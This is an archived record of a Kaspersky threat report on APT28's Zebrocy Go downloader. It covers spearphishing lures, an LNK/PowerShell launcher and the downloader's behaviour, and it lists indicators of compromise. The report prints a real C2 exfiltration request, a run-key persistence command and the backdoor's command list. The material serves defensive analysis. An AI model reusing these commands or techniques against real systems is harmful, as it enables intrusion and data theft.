{ "id": "bbda597d-a102-462c-8362-7bf01dea567f", "created_at": "2026-04-06T00:11:50.593106Z", "updated_at": "2026-04-10T03:37:50.045157Z", "deleted_at": null, "sha1_hash": "fb42bf16042b02809151ce77353f44140fca1e3f", "title": "A Zebrocy Go Downloader", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 117963, "plain_text": "A Zebrocy Go Downloader\r\nBy GReAT\r\nPublished: 2019-01-11 · Archived: 2026-04-05 17:14:02 UTC\r\nLast year at SAS2018 in Cancun, Mexico, “Masha and these Bears” included discussion of a subset of Sofacy\r\nactivity and malware that we call “Zebrocy”, and predictions for the decline of SPLM/XAgent Sofacy activity\r\ncoinciding with the acceleration of Zebrocy activity and innovation. Zebrocy was initially introduced as a Sofacy\r\nbackdoor package in 2015, but the Zebrocy cluster has carved a new approach to malware development and\r\ndelivery to the world of Sofacy. In line with this approach, we will present more on this Zebrocy innovation and\r\nactivity playing out at SAS 2019 in Singapore.\r\nOur colleagues at Palo Alto recently posted an analysis of Zebrocy malware. The analysis is good and marked\r\ntheir first detection of a Zebrocy Go variant as October 11, 2018. Because there is much to this cluster, clarifying\r\nand adding to the discussion is always productive.\r\nOur original “Zebrocy Innovates – Layered Spearphishing Attachments and Go Downloaders” June 2018 writeup\r\ndocuments the very same downloader, putting the initial deployment of Zebrocy Go downloader activity at May\r\n10, 2018. And while the targeting in the May event was most likely different from the October event, we\r\ndocumented this same Go downloader and same C2 was used to target a Kyrgyzstan organization. Also interesting\r\nis that the exact same system was a previous Zebrocy target earlier in 2018. So, knowing that this same activity is\r\nbeing reported on as “new” six months later tells us a bit about the willingness of this group to re-use rare\r\ncomponents and infrastructure across different targets.\r\nWhile they are innovating with additional languages, as we predicted in early 2018, their infrastructure and\r\nindividual components may have more longevity than predicted. Additionally, at the beginning of 2018, we\r\npredicted the volume of Zebrocy activity and innovation will continue to increase, while the more traditional\r\nSPLM/XAgent activity will continue to decline. Reporting on SPLM/XAgent certainly has followed this course in\r\n2018 as SPLM/XAgent detections wind down globally, as has Sofacy’s use of this malware from our perspective.\r\nMuch of the content below is reprinted from our June document.\r\nThe Sofacy subset we identify as “Zebrocy” continues to target Central Asian government related organizations,\r\nboth in-country and remote locations, along with a new middle eastern diplomatic target. And, as predicted, they\r\ncontinue to build out their malware set with a variety of scripts and managed code. In this case, we see new\r\nspearphishing components – an LNK file maintaining powershell scripts and a Go-implemented system\r\ninformation collector/downloader. This is the first time we have observed a well-known APT deploy malware with\r\nthis compiled, open source language “Go”. There is much continued recent Zebrocy activity using their previously\r\nknown malware set as well.\r\nStarting in May 2018, Zebrocy spearphished Central Asian government related targets directly with this new Go\r\ndownloader. For example, the attachment name included one “30-144.arj” compressed archive, an older archiver\r\ntype handled by 7zip, Rar/WinRAR, and others. Users found “30-144.exe” inside the archive with an altered file\r\nhttps://securelist.com/a-zebrocy-go-downloader/89419/\r\nPage 1 of 7\n\nicon made to look like the file was a Word document (regardless of the .exe file extension). And in a similar\r\nfashion in early June, Zebrocy spearphished over a half-dozen accounts targeting several Central Asian countries’\r\ndiplomatic organizations with a similar scheme “2018-05-Invitation-Letter(1).rar//2018-05-Invitation-Letter(pril).docx”, sending out a more common Zebrocy Delphi downloader.\r\nIn other cases, delivery of the new Go downloader was not straightforward. The new Go downloader also was\r\ndelivered with a new spearphishing object that rolls up multiple layers of LNK file, powershell scripts, base64\r\nencoded content, .docx files and the Go downloader files. The downloader is an unusually large executable at over\r\n1.5mb, written to disk and launched by a powershell script. So the attachment that arrived over email was large.\r\nThe powershell script reads the file’s contents from a very large LNK file that was included as an email\r\nattachment, and then writes it to disk along with a Word document of the same name. So, launching the\r\ndownloader is followed with the opening of an identically named decoy word document with “WINWORD.EXE”\r\n/n “***\\30-276(pril).docx” /o”. The downloader collects a large amount of system information and POSTs it to a\r\nknown Zebrocy C2, then pulls down known Zebrocy Delphi payload code, launches it, and deletes itself.\r\nWe observed previous, somewhat similar spearphishing scenarios with an archive containing .LNK, .docx, and\r\nbase64 encoded executable code, delivering offensive Finfisher objects in separate intrusion activity clusters. This\r\nactivity was not Sofacy, but the spearphishing techniques were somewhat similar – the layered powershell script\r\nattachment technique is not the same, but not altogether new.\r\nAnd, it is important to reiterate that these Central Asian government and diplomatic targets are often geolocated\r\nremotely. In the list of target geolocations, notice countries like South Korea, the Netherlands, etc. In addition to\r\nZebrocy Go downloader data, this report provides data on various other observed Zebrocy malware and targets\r\nover the past three months.\r\nSpreading\r\nMostly all observed Zebrocy activity involves spearphishing. Spearphish attachments arrive with .rar or .arj\r\nextensions. Filename themes include official government correspondence invitations, embassy notes, and other\r\nrelevant items of interest to diplomatic and government staff. Enclosed objects may be LNK, docx, or exe files.\r\nA decoy PDF that directly targeted a Central Asian nation is included in one of the .arj attachments alongside the\r\nGo downloader. The content is titled “Possible joint projects in cooperation with the International Academy of\r\nSciences” and lists multiple potential projects requiring international cooperation with Tajikistan and other\r\ncountries. This document appears to be a legitimate one that was stolen, created mid-May 2018. While we cannot\r\nreprint potentially leaked information publicly, clearly, the document was intended for a Russian-language reader.\r\nPowershell launcher from within LNK\r\nThe LNK containing two layers of powershell script and base64 encoded content is an unusual implementation –\r\ncontents from a couple are listed at the technical appendix. When opened, the script opens the shortcut file it is\r\ndelivered within (“30-276(pril).docx.lnk”), pulls out the base64 encoded contents (in one case, from byte 3507 to\r\nbyte 6708744), base64 decodes the content and another layer of the same powershell decoding. This script writes\r\ntwo files to disk as “30-276(pril).exe” and “30-276(pril).docx” and opens both files, leading to the launch of the\r\nGo language system information collector/downloader and a decoy Word document.\r\nhttps://securelist.com/a-zebrocy-go-downloader/89419/\r\nPage 2 of 7\n\nGo System Information Collector/Downloader\r\nMd5              333d2b9e99b36fb42f9e79a2833fad9c\r\nSha256         fcf03bf5ef4babce577dd13483391344e957fd2c855624c9f0573880b8cba62e\r\nSize              1.79mb (upx packed – 3.5mb upx unpacked)\r\nCompiledOn Stomped (Wed Dec 31 17:00:00 1969)\r\nType             PE 32-bit Go executable\r\nName           30-276(pril).exe\r\nThis new Go component not only downloads and executes another Zebrocy component, but it enumerates and\r\ncollects a fair amount of system data for upload to its C2, prior to downloading and executing any further\r\nmodules. It simply collects data using the systeminfo utility, and in turn makes a variety of WMI calls.\r\nAfter collecting system information, the backdoor calls out to POST to its hardcoded C2, in this case a hardcoded\r\nIP/Url. Note that the backdoor simply uses the default Go user-agent:\r\n“POST /technet-support/library/online-service-description.php?id_name=345XXXD5\r\nHTTP/1.1\r\nHost: 89.37.226.148\r\nUser-Agent: Go-http-client/1.1”\r\nWith this POST, the module uploads all of the system information it just gathered with the exhaustive systeminfo\r\nutility over http: hostname, date/time, all hardware, hotfix, service and software information.\r\nThe module then retrieves the gzip’d, better known Zebrocy dropper over port 80 as part of an encoded jpg file,\r\nwrites it to disk, and executes from a command line:\r\n“cmd /C c:\\users\\XXX\\appdata\\local\\Identities\\{83AXXXXX-986F-1673-091A-02XXXXXXXXXX}\\w32srv.exe”\r\nand adds a run key persistence entry with the system utility reg.exe:\r\ncmd /C “reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Driveupd /d\r\nc:\\users\\XXX\\appdata\\local\\Identities\\{83AXXXXX-986F-1673-091A-02XXXXXXXXXX}\\w32srv.exe /f”\r\nZebrocy AutoIT Dropper\r\nMd5              3c58ed6913593671666283cb7315dec3\r\nSha256         96c3700ad639faa85982047e05fbd71c3dfd502b09f9860685498124e7dbaa46\r\nSize              478.5kb (upx-packed)\r\nCompiled     Fri Apr 27 06:40:32 2018\r\nType             PE32 AutoIT executable\r\nPath, Name  appdata\\Identities\\{83AF1378-986F-1673-091A-02681FA62C3B}\\w32srv.exe\r\nThis AutoIT dropper writes out a Delphi payload, consistent with previous behavior going back to November\r\n2015, initially described in our January 2016 report “Zebrocy – Sofacy APT Deploys New Delphi Payload”.\r\nZebrocy Delphi Payload\r\nhttps://securelist.com/a-zebrocy-go-downloader/89419/\r\nPage 3 of 7\n\nMd5               2f83acae57f040ac486eca5890649381\r\nSha256          f9e96b2a453ff8922b1e858ca2d74156cb7ba5e04b3e936b77254619e6afa4e8\r\nSize               786kb\r\nCompiled       Fri Jun 19 16:22:17 1992 (stomped/altered)\r\nType              PE32 exe [v4.7.7]\r\nPath, Name   c:\\ProgramData\\Protection\\Active\\armpro.exe\r\nInterestingly the final payload reverts back to an earlier version [v4.7.7]. A “TURBO” command is missing from\r\nthis Zebrocy Delphi backdoor command list .\r\nSYS_INFO\r\nSCAN_ALL\r\nSCAN_LIST\r\nDOWNLOAD_DAY\r\nDOWNLOAD_LIST\r\nCREATE_FOLDER\r\nUPLOAD_FILE\r\nFILE_EXECUTE\r\nDELETE_FILES\r\nREG_WRITE_VALUE\r\nREG_READ_VALUE\r\nREG_DELETE_VALUE\r\nREG_GET_KEYS_VALUES\r\nREG_DELETE_KEY\r\nKILL_PROCESS\r\nCONFIG\r\nGET_NETWORK\r\nCMD_EXECUTE\r\nDOWNLOAD_DATE\r\nDELETE_FOLDER\r\nUPLOAD_AND_EXECUTE_FILE\r\nSCREENSHOTS\r\nFILE_EXECUTE\r\nSET_HIDDEN_ATTR\r\nSTART\r\nSTOP\r\nKILL_MYSELF\r\nInfrastructure\r\nZebrocy backdoors are configured to directly communicate with IP assigned web server hosts over port 80, and\r\napparently the group favors Debian Linux for this part of infrastructure: Apache 2.4.10 running on Debian Linux.\r\nA somewhat sloppy approach continues, and the group set up and configured one of the sites with digital\r\nhttps://securelist.com/a-zebrocy-go-downloader/89419/\r\nPage 4 of 7\n\ncertificates using a typical Sofacy-sounding domain that they have not yet registered: “weekpost.org”. Digital\r\ncertificate details are provided in the appendix.\r\nThese “fast setup” VPS servers run in “qhoster[.]com” can be paid for with Webmoney, Bitcoin, Litecoin, Dash,\r\nAlfa Click, Qiwi, transfers from Sberbank Rossii, Svyaznoy, Promsvyazbank, and more. Although, it appears that\r\nBitcoin and Dash may be of the most interest to help ensure anonymous transactions. Dataclub provides similar\r\npayment methods:\r\nOne of the VPS IP addresses (80.255.12[.]252) is hosted in the “afterburst[.]com”/Oxygem range. This service is\r\nthe odd one out and is unusual because it only supports VISA/major credit cards and Paypal at checkout. If other\r\npayment options are provided, they are not a part of the public interface.\r\nVictims and Targeting\r\nZebrocy Go downloader 2018 targets continue to be Central Asian government foreign policy and administrative\r\nrelated. Some of these organizations are geolocated in-country, or locally, and some are located remotely. In\r\nseveral cases, these same systems have seen multiple artefacts from Zebrocy over the course of 2017 and early\r\n2018:\r\n• Kazakhstan\r\n• Kyrgyzstan\r\n• Azerbaijan\r\n• Tajikistan\r\nAdditional recent Zebrocy target geo-locations (targeting various Central Asian/ex-USSR local and remote\r\ngovernment locations):\r\n• Qatar\r\n• Ukraine\r\n• Czech Republic\r\n• Mongolia\r\n• Jordan\r\n• Germany\r\n• Belgium\r\n• Iran\r\n• Turkey\r\n• Armenia\r\n• Afghanistan\r\n• South Korea\r\n• Turkmenistan\r\n• Kazakhstan\r\nhttps://securelist.com/a-zebrocy-go-downloader/89419/\r\nPage 5 of 7\n\n• Netherlands\r\n• Kuwait\r\n• United Arab Emirates\r\n• Spain\r\n• Poland\r\n• Qatar\r\n• Oman\r\n• Switzerland\r\n• Mongolia\r\n• Kyrgyzstan\r\n• United Kingdom\r\nAttribution\r\nZebrocy activity is a known subset of Sofacy activity. We predicted that they would continue to innovate within\r\ntheir malware development after observing past behavior, developing with Delphi, AutoIT, .Net C#, Powershell,\r\nand now “Go” languages. Their continued targeting, phishing techniques, infrastructure setup, technique and\r\nmalware innovation, and previously known backdoors help provide strong confidence that this activity continues\r\nto be Zebrocy.\r\nConclusions\r\nZebrocy continues to maintain a higher level of volume attacking local and remote ex-USSR republic Central\r\nAsian targets than other clusters of targeted Sofacy activity. Also interesting with this Sofacy sub-group is the\r\ninnovation that we continue to see within their malware development. Much of the spearphishing remains\r\nthematically the same, but the remote locations of these Central Asian targets are becoming more spread out –\r\nSouth Korea, Netherlands, etc. While their focus has been on Windows users, it seems that we can expect the\r\ngroup to continue making more innovations within their malware set. Perhaps all their components will soon\r\nsupport all OS platforms that their targets may be using, including Linux and MacOS. Zebrocy spearphishing\r\ncontinues to be characteristically higher volume for a targeted attacker, and most likely that trend will continue.\r\nAnd, as their spearphishing techniques progress to rival Finfisher techniques without requiring zero-day\r\nexploitation, perhaps Zebrocy will expand their duplication of more sources of open source spearphishing\r\ntechniques.\r\nIoC\r\nGo downloader\r\n333d2b9e99b36fb42f9e79a2833fad9c\r\nIPs\r\n80.255.12.252\r\n89.37.226.148\r\n46.183.218.34\r\nhttps://securelist.com/a-zebrocy-go-downloader/89419/\r\nPage 6 of 7\n\n185.77.131.110\r\n92.114.92.128\r\nURLs\r\n/technet-support/library/online-service-description.php?id_name=XXXXX\r\n/software-apptication/help-support-apl/getidpolapl.php\r\nFile – paths and names\r\n30-276(pril).exe\r\n30-144-(copy).exe\r\nEmbassy Note No.259.docx.lnk\r\n2018-05-Invitation-Letter(1).rar//2018-05-Invitation-Letter(pril).docx\r\nSource: https://securelist.com/a-zebrocy-go-downloader/89419/\r\nhttps://securelist.com/a-zebrocy-go-downloader/89419/\r\nPage 7 of 7", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "Malpedia" ], "references": [ "https://securelist.com/a-zebrocy-go-downloader/89419/" ], "report_names": [ "89419" ], "threat_actors": [ { "id": "730dfa6e-572d-473c-9267-ea1597d1a42b", "created_at": "2023-01-06T13:46:38.389985Z", "updated_at": "2026-04-10T02:00:02.954105Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "Pawn Storm", "ATK5", "Fighting Ursa", "Blue Athena", "TA422", "T-APT-12", "APT-C-20", "UAC-0001", "IRON TWILIGHT", "SIG40", "UAC-0028", "Sofacy", "BlueDelta", "Fancy Bear", "GruesomeLarch", "Group 74", "ITG05", "FROZENLAKE", "Forest Blizzard", "FANCY BEAR", "Sednit", "SNAKEMACKEREL", "Tsar Team", "TG-4127", "STRONTIUM", "Grizzly Steppe", "G0007" ], "source_name": "MISPGALAXY:APT28", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3767160-695d-4360-8b2e-d5274db3f7cd", "created_at": "2022-10-25T16:47:55.914348Z", "updated_at": "2026-04-10T02:00:03.610018Z", "deleted_at": null, "main_name": "IRON TWILIGHT", "aliases": [ "APT28 ", "ATK5 ", "Blue Athena ", "BlueDelta ", "FROZENLAKE ", "Fancy Bear ", "Fighting Ursa ", "Forest Blizzard ", "GRAPHITE ", "Group 74 ", "PawnStorm ", "STRONTIUM ", "Sednit ", "Snakemackerel ", "Sofacy ", "TA422 ", "TG-4127 ", "Tsar Team ", "UAC-0001 " ], "source_name": "Secureworks:IRON TWILIGHT", "tools": [ "Downdelph", "EVILTOSS", "SEDUPLOADER", "SHARPFRONT" ], "source_id": "Secureworks", "reports": null }, { "id": "ae320ed7-9a63-42ed-944b-44ada7313495", "created_at": "2022-10-25T15:50:23.671663Z", "updated_at": "2026-04-10T02:00:05.283292Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "APT28", "IRON TWILIGHT", "SNAKEMACKEREL", "Group 74", "Sednit", "Sofacy", "Pawn Storm", "Fancy Bear", "STRONTIUM", "Tsar Team", "Threat Group-4127", "TG-4127", "Forest Blizzard", "FROZENLAKE", "GruesomeLarch" ], "source_name": "MITRE:APT28", "tools": [ "Wevtutil", "certutil", "Forfiles", "DealersChoice", "Mimikatz", "ADVSTORESHELL", "Komplex", "HIDEDRV", "JHUHUGIT", "Koadic", "Winexe", "cipher.exe", "XTunnel", "Drovorub", "CORESHELL", "OLDBAIT", "Downdelph", "XAgentOSX", "USBStealer", "Zebrocy", "reGeorg", "Fysbis", "LoJax" ], "source_id": "MITRE", "reports": null }, { "id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab", "created_at": "2022-10-25T16:07:24.212584Z", "updated_at": "2026-04-10T02:00:04.900038Z", "deleted_at": null, "main_name": "Sofacy", "aliases": [ "APT 28", "ATK 5", "Blue Athena", "BlueDelta", "FROZENLAKE", "Fancy Bear", "Fighting Ursa", "Forest Blizzard", "G0007", "Grey-Cloud", "Grizzly Steppe", "Group 74", "GruesomeLarch", "ITG05", "Iron Twilight", "Operation DealersChoice", "Operation Dear Joohn", "Operation Komplex", "Operation Pawn Storm", "Operation RoundPress", "Operation Russian Doll", "Operation Steal-It", "Pawn Storm", "SIG40", "Sednit", "Snakemackerel", "Sofacy", "Strontium", "T-APT-12", "TA422", "TAG-0700", "TAG-110", "TG-4127", "Tsar Team", "UAC-0028", "UAC-0063" ], "source_name": "ETDA:Sofacy", "tools": [ "ADVSTORESHELL", "AZZY", "Backdoor.SofacyX", "CHERRYSPY", "CORESHELL", "Carberp", "Computrace", "DealersChoice", "Delphacy", "Downdelph", "Downrage", "Drovorub", "EVILTOSS", "Foozer", "GAMEFISH", "GooseEgg", "Graphite", "HATVIBE", "HIDEDRV", "Headlace", "Impacket", "JHUHUGIT", "JKEYSKW", "Koadic", "Komplex", "LOLBAS", "LOLBins", "Living off the Land", "LoJack", "LoJax", "MASEPIE", "Mimikatz", "NETUI", "Nimcy", "OCEANMAP", "OLDBAIT", "PocoDown", "PocoDownloader", "Popr-d30", "ProcDump", "PythocyDbg", "SMBExec", "SOURFACE", "SPLM", "STEELHOOK", "Sasfis", "Sedkit", "Sednit", "Sedreco", "Seduploader", "Shunnael", "SkinnyBoy", "Sofacy", "SofacyCarberp", "SpiderLabs Responder", "Trojan.Shunnael", "Trojan.Sofacy", "USB Stealer", "USBStealer", "VPNFilter", "Win32/USBStealer", "WinIDS", "Winexe", "X-Agent", "X-Tunnel", "XAPS", "XTunnel", "Xagent", "Zebrocy", "Zekapab", "carberplike", "certutil", "certutil.exe", "fysbis", "webhp" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434310, "ts_updated_at": 1775792270, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/fb42bf16042b02809151ce77353f44140fca1e3f.pdf", "text": "https://archive.orkl.eu/fb42bf16042b02809151ce77353f44140fca1e3f.txt", "img": "https://archive.orkl.eu/fb42bf16042b02809151ce77353f44140fca1e3f.jpg" } }